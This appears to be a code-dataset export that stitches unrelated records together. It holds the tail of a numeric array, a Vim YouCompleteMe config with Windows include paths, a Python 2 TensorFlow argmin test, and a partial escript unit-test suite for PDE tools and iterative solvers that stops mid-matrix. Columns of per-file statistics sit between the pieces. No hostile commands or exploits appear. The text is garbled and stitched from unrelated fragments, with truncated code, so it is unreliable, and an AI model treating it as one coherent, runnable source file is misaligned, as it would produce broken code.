600, 600, 600, 600, 600, 600, 600, 600,
600, 600, 600, 600, 600, 600, 600, 600,
600, 600, 600, 600, 600, 600, 600, 600,
600, 600, 600, 600, 600, 600, 600, 600,
600, 600, 600, 600, 600, 600, 600, 600,
600, 600, 600, 600, 600, 600, 600, 600,
600, 600, 600, 600, 600, 600, 600, 600,
600, 600, 600, 600, 600, 600, 600, 600,
600, 600, 600, 600, 600, 600, 600, 600,
600, 600, 600, 600, 600, 600, 600, 600,
600, 600, 600, 600, 600, 600, 600, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 600, 600, 600, 600, 600, 600, 600,
600, 600, 600, 600, 600, 600, 600, 600,
0, 600, 600, 600, 600, 0, 600, 600,
600, 600, 600, 600, 600, 600, 0, 600,
0, 600, 600, 600, 600, 600, 600, 600,
600, 0, 600, 600, 0, 600, 600, 600,
600, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 600, 0, 600, 0, 0, 0, 0,
600, 600, 600, 600, 0, 0, 0, 0,
0, 600, 0, 0, 0, 600, 0, 0,
600, 600, 600, 600, 0, 0, 0, 0,
])
| 45.857143
| 84
| 0.410177
| 296
| 1,926
| 2.652027
| 0.10473
| 1.031847
| 1.444586
| 1.803822
| 0.705732
| 0.701911
| 0.695541
| 0.689172
| 0.686624
| 0.682803
| 0
| 0.51879
| 0.433541
| 1,926
| 41
| 85
| 46.97561
| 0.200733
| 0.127726
| 0
| 0.685714
| 1
| 0
| 0.008368
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4f550d9e2070e56ce20852e02ea1c388c883935c
| 817
|
py
|
Python
|
vimfiles/globals/.ycm_extra_conf.py
|
jurek333/WinVimConfig
|
2e3859fe907447f151c0c71e1550664fff88bc21
|
[
"MIT"
] | null | null | null |
vimfiles/globals/.ycm_extra_conf.py
|
jurek333/WinVimConfig
|
2e3859fe907447f151c0c71e1550664fff88bc21
|
[
"MIT"
] | null | null | null |
vimfiles/globals/.ycm_extra_conf.py
|
jurek333/WinVimConfig
|
2e3859fe907447f151c0c71e1550664fff88bc21
|
[
"MIT"
] | null | null | null |
def FlagsForFile(filename, **kwargs):
return {
'flags': ['-x', 'c++', '-std=c++14', '-Wall', '-Wextra', '-Werror'
,'-I','C:/Program Files (x86)/Microsoft Visual Studio/2017/Community/VC/Tools/MSVC/14.13.26128/include'
,'-I','C:/Program Files (x86)/Microsoft Visual Studio/2017/Community/VC/Tools/MSVC/14.13.26128/atlmfc/include'
,'-I','C:/Program Files (x86)/Microsoft Visual Studio/2017/Community/VC/Auxiliary/VS/include'
,'-I','C:/Program Files (x86)/Windows Kits/10/Include/10.0.16299.0/ucrt'
,'-I','C:/Program Files (x86)/Windows Kits/10/Include/10.0.16299.0/um'
,'-I','C:/Program Files (x86)/Windows Kits/10/Include/10.0.16299.0/shared'
,'-I','C:/Program Files (x86)/Windows Kits/10/Include/10.0.16299.0/winrt'
,'-I','C:/Program Files (x86)/Windows Kits/NETFXSDK/4.6.1/Include/um']
}
| 62.846154
| 113
| 0.668299
| 132
| 817
| 4.136364
| 0.333333
| 0.029304
| 0.131868
| 0.205128
| 0.783883
| 0.783883
| 0.771062
| 0.71978
| 0.71978
| 0.71978
| 0
| 0.128205
| 0.093023
| 817
| 12
| 114
| 68.083333
| 0.608637
| 0
| 0
| 0
| 0
| 0.666667
| 0.801714
| 0.397797
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0
| 0.083333
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4f8df0e1a5c5d1cdbe6506fce2eaf8ce245ec8c1
| 383
|
py
|
Python
|
test/optest/tfunits/ArgMinTest.py
|
ishine/MAI
|
64753cd2f59af2949896937c2e5dbfc4d8bab1e0
|
[
"Apache-2.0"
] | null | null | null |
test/optest/tfunits/ArgMinTest.py
|
ishine/MAI
|
64753cd2f59af2949896937c2e5dbfc4d8bab1e0
|
[
"Apache-2.0"
] | null | null | null |
test/optest/tfunits/ArgMinTest.py
|
ishine/MAI
|
64753cd2f59af2949896937c2e5dbfc4d8bab1e0
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
sess = tf.InteractiveSession()
t1=tf.constant([2., 1.,3, 4], dtype=tf.float32)
t2=tf.constant(0, dtype=tf.int32)
t1=tf.reshape(t1,[2,2]).eval()
target = tf.argmin(t1, t2).eval()
print target
t1=tf.constant([2., 1.,3, 4], dtype=tf.float32)
t2=tf.constant(1, dtype=tf.int32)
t1=tf.reshape(t1,[2,2]).eval()
target = tf.argmin(t1, t2).eval()
print target
| 18.238095
| 47
| 0.673629
| 71
| 383
| 3.633803
| 0.309859
| 0.062016
| 0.093023
| 0.100775
| 0.821705
| 0.821705
| 0.821705
| 0.821705
| 0.821705
| 0.821705
| 0
| 0.099415
| 0.10705
| 383
| 20
| 48
| 19.15
| 0.654971
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.083333
| null | null | 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96d72678969ba0a57547b62e79c71da701c9f11e
| 66,828
|
py
|
Python
|
escriptcore/test/python/test_pdetools.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | null | null | null |
escriptcore/test/python/test_pdetools.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | 1
|
2019-01-14T03:07:43.000Z
|
2019-01-14T03:07:43.000Z
|
escriptcore/test/python/test_pdetools.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2003-2018 by The University of Queensland
# http://www.uq.edu.au
#
# Primary Business: Queensland, Australia
# Licensed under the Apache License, version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
#
# Development until 2012 by Earth Systems Science Computational Center (ESSCC)
# Development 2012-2013 by School of Earth Sciences
# Development from 2014 by Centre for Geoscience Computing (GeoComp)
#
##############################################################################
from __future__ import print_function, division
__copyright__="""Copyright (c) 2003-2018 by The University of Queensland
http://www.uq.edu.au
Primary Business: Queensland, Australia"""
__license__="""Licensed under the Apache License, version 2.0
http://www.apache.org/licenses/LICENSE-2.0"""
__url__="https://launchpad.net/escript-finley"
"""
Test suite for the pdetools module
The tests must be linked with a Domain class object in the setUp method:
from esys.dudley import Rectangle
class Test_LinearPDEOnDudley(Test_LinearPDE):
RES_TOL=1.e-8
def setUp(self):
self.domain = Rectangle(10,10,2)
def tearDown(self):
del self.domain
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(Test_LinearPDEOnDudley))
unittest.TextTestRunner(verbosity=2).run(suite)
:var __author__: name of author
:var __copyright__: copyrights
:var __license__: licence agreement
:var __url__: url entry point on documentation
:var __version__: version
:var __date__: date of the version
"""
__author__="Lutz Gross, l.gross@uq.edu.au"
import esys.escriptcore.utestselect as unittest
import numpy
from esys.escript import *
from esys.escript.pdetools import Locator,Projector,TimeIntegrationManager,NoPDE,PCG, ArithmeticTuple, GMRES, MINRES, TFQMR, HomogeneousSaddlePointProblem
from esys.escript.pdetools import Defect, NewtonGMRES
from numpy.linalg import solve as solve_linear_equations
class Test_pdetools_noLumping(unittest.TestCase):
DEBUG=False
VERBOSE=False
def test_TimeIntegrationManager_scalar(self):
t=0.
dt=0.1
tm=TimeIntegrationManager(0.,p=1)
while t<1.:
t+=dt
tm.checkin(dt,t)
v_guess=tm.extrapolate(dt)
self.assertLess(abs(v_guess-(tm.getTime()+dt)), self.RES_TOL, "extrapolation is wrong")
def test_TimeIntegrationManager_vector(self):
t=0.
dt=0.3
tm=TimeIntegrationManager(0.,0.,p=1)
while t<1.:
t+=dt
tm.checkin(dt,t,3*t)
v_guess=tm.extrapolate(dt)
e=max(abs(v_guess[0]-(tm.getTime()+dt)),abs(v_guess[1]-(tm.getTime()+dt)*3.))
self.assertLess(e, self.RES_TOL)
def test_Locator(self):
x=self.domain.getX()
l=Locator(self.domain,numpy.ones((self.domain.getDim(),)))
self.assertTrue(ContinuousFunction(self.domain)==l.getFunctionSpace(),"wrong function space from domain")
l=Locator(ContinuousFunction(self.domain),numpy.ones((self.domain.getDim(),)))
self.assertTrue(ContinuousFunction(self.domain)==l.getFunctionSpace(),"wrong function space")
xx=l.getX()
self.assertTrue(isinstance(xx,numpy.ndarray),"wrong vector type")
self.assertTrue(Lsup(xx-numpy.ones((self.domain.getDim(),)))<self.RES_TOL,"location wrong")
xx=l(x)
self.assertTrue(isinstance(xx,numpy.ndarray),"wrong vector type")
self.assertTrue(Lsup(xx-numpy.ones((self.domain.getDim(),)))<self.RES_TOL,"value wrong vector")
xx=l(x[0]+x[1])
self.assertTrue(isinstance(xx,float),"wrong scalar type")
self.assertTrue(abs(xx-2.)<self.RES_TOL,"value wrong scalar")
# now with interpolation:
l=Locator(Function(self.domain),numpy.ones((self.domain.getDim(),)))
x2=Function(self.domain).getX()
xx=l(x)
self.assertTrue(isinstance(xx,numpy.ndarray),"wrong vector type")
self.assertTrue(Lsup(xx-l(x2))<self.RES_TOL,"location wrong")
xx=l(x[0]+x[1])
self.assertTrue(isinstance(xx,float),"wrong scalar type")
self.assertLess(abs(xx-l(x2[0])-l(x2[1])), self.RES_TOL)
l=Locator(self.domain,numpy.ones((self.domain.getDim(),)))
d=Data(0, ContinuousFunction(self.domain))
l.setValue(d, 7)
self.assertTrue(sup(d)>6, "value not set") # guarantees we have set something
self.assertLess(Lsup(l.getValue(d)-7), self.RES_TOL, "value not set in the correct place")
def test_Locator_withList(self):
x=self.domain.getX()
arg=[numpy.ones((self.domain.getDim(),)), numpy.zeros((self.domain.getDim(),))]
l=Locator(self.domain,arg)
self.assertTrue(ContinuousFunction(self.domain)==l.getFunctionSpace(),"wrong function space from domain")
l=Locator(ContinuousFunction(self.domain),arg)
self.assertTrue(ContinuousFunction(self.domain)==l.getFunctionSpace(),"wrong function space")
xx=l.getX()
self.assertTrue(isinstance(xx,list),"list expected")
for i in range(len(xx)):
self.assertTrue(isinstance(xx[i],numpy.ndarray),"vector expected for %s item"%i)
self.assertTrue(Lsup(xx[i]-arg[i])<self.RES_TOL,"%s-th location is wrong"%i)
xx=l(x)
self.assertTrue(isinstance(xx,list),"list expected (2)")
for i in range(len(xx)):
self.assertTrue(isinstance(xx[i],numpy.ndarray),"vector expected for %s item (2)"%i)
self.assertTrue(Lsup(xx[i]-arg[i])<self.RES_TOL,"%s-th location is wrong (2)"%i)
xx=l(x[0]+x[1])
self.assertTrue(isinstance(xx,list),"list expected (3)")
for i in range(len(xx)):
self.assertTrue(isinstance(xx[i],float),"wrong scalar type")
self.assertTrue(abs(xx[i]-(arg[i][0]+arg[i][1]))<self.RES_TOL,"value wrong scalar")
# now with interpolation:
l=Locator(Function(self.domain),arg)
self.assertTrue(Function(self.domain)==l.getFunctionSpace(),"wrong function space")
xx=l(x)
x2=Function(self.domain).getX()
self.assertTrue(isinstance(xx,list),"list expected (2)")
for i in range(len(xx)):
self.assertTrue(isinstance(xx[i],numpy.ndarray),"vector expected for %s item (2)"%i)
self.assertTrue(Lsup(xx[i]-l(x2)[i])<self.RES_TOL,"%s-th location is wrong (2)"%i)
xx=l(x[0]+x[1])
self.assertTrue(isinstance(xx,list),"list expected (3)")
for i in range(len(xx)):
self.assertTrue(isinstance(xx[i],float),"wrong scalar type")
self.assertLess(abs(xx[i]-(l(x2[0])[i]+l(x2[1])[i])), self.RES_TOL)
l=Locator(self.domain,numpy.ones((self.domain.getDim(),)))
d=Data(0, ContinuousFunction(self.domain))
l.setValue(d, 7)
self.assertTrue(sup(d)>6, "value not set") # guarantees we have set something
self.assertLess(Lsup(l.getValue(d)-7), self.RES_TOL, "value not set in the correct place")
def testProjector_rank0(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=x[0]
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank1(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=x
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank2(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[11.,12.],[21,22.]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank3(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank4(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
[[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank0_reduced(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=x[0]
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank1_reduced(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=x
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank2_reduced(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=[[11.,12.],[21,22.]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank3_reduced(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=[[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank4_reduced(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=[[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
[[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank0_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=x[0]
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank1_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=x
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank2_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[11.,12.],[21,22.]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank3_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank4_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
[[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank0_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=1.
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank1_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=numpy.array([1.,2.,3.])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank2_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=numpy.array([[11.,12.],[21,22.]])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank3_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=numpy.array([[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank4_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=numpy.array([[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
[[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def test_NoPDE_scalar_missing_r(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])
p.setValue(D=1.,Y=1.,q=msk)
u=p.getSolution()
u_ex=(1.-msk)
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_scalar_missing_Y(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])
p.setValue(D=1.,q=msk,r=2.)
u=p.getSolution()
u_ex=msk*2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_scalar_constant(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])
p.setValue(D=1.,Y=1.,q=msk,r=2.)
u=p.getSolution()
u_ex=(1.-msk)+msk*2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_scalar_variable(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])
p.setValue(D=10,Y=2*10,q=msk,r=2.)
u=p.getSolution()
u_ex=2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_vector_missing_Y(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])*[1.,0.]
p.setValue(D=numpy.ones([2]),q=msk,r=2.)
u=p.getSolution()
u_ex=msk*2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_vector_missing_r(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])*[1.,0.]
p.setValue(D=numpy.ones([2]),Y=numpy.ones([2]),q=msk)
u=p.getSolution()
u_ex=(1.-msk)
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_vector_constant(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])*[1.,0.]
p.setValue(D=numpy.ones([2]),Y=numpy.ones([2]),q=msk,r=2.)
u=p.getSolution()
u_ex=(1.-msk)+msk*2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_vector_variable(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])*[1.,0.]
p.setValue(D=x[:2]+1,Y=2*(x[:2]+1),q=msk,r=2.)
u=p.getSolution()
u_ex=2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
#=====
def testPCG(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def Ap(x):
return dot(A,x)
def Ms(b):
out=zeros((b.size,),float64)
for i in range(size(b)):
out[i]=b[i]/A[i,i]
return out
tol=1.e-4
x,r,a_norm=PCG(b*1.,Ap,x_ref*0.,Ms,dot, atol=0, rtol=tol, iter_max=12)
self.assertLess(Lsup(x-x_ref), Lsup(x_ref)*tol*10.)
self.assertLess(Lsup(r-(b-dot(A,x))), Lsup(b)*EPSILON*100.)
def testMINRES(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def Ap(x):
return dot(A,x)
def Ms(b):
out=zeros((size(b),),float64)
for i in range(size(b)):
out[i]=b[i]/A[i,i]
return out
tol=1.e-4
x=MINRES(b*1.,Ap,x_ref*0,Ms,dot, atol=0, rtol=tol, iter_max=12)
self.assertLess(Lsup(x-x_ref), Lsup(x_ref)*tol*10.)
def testTFQMR(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
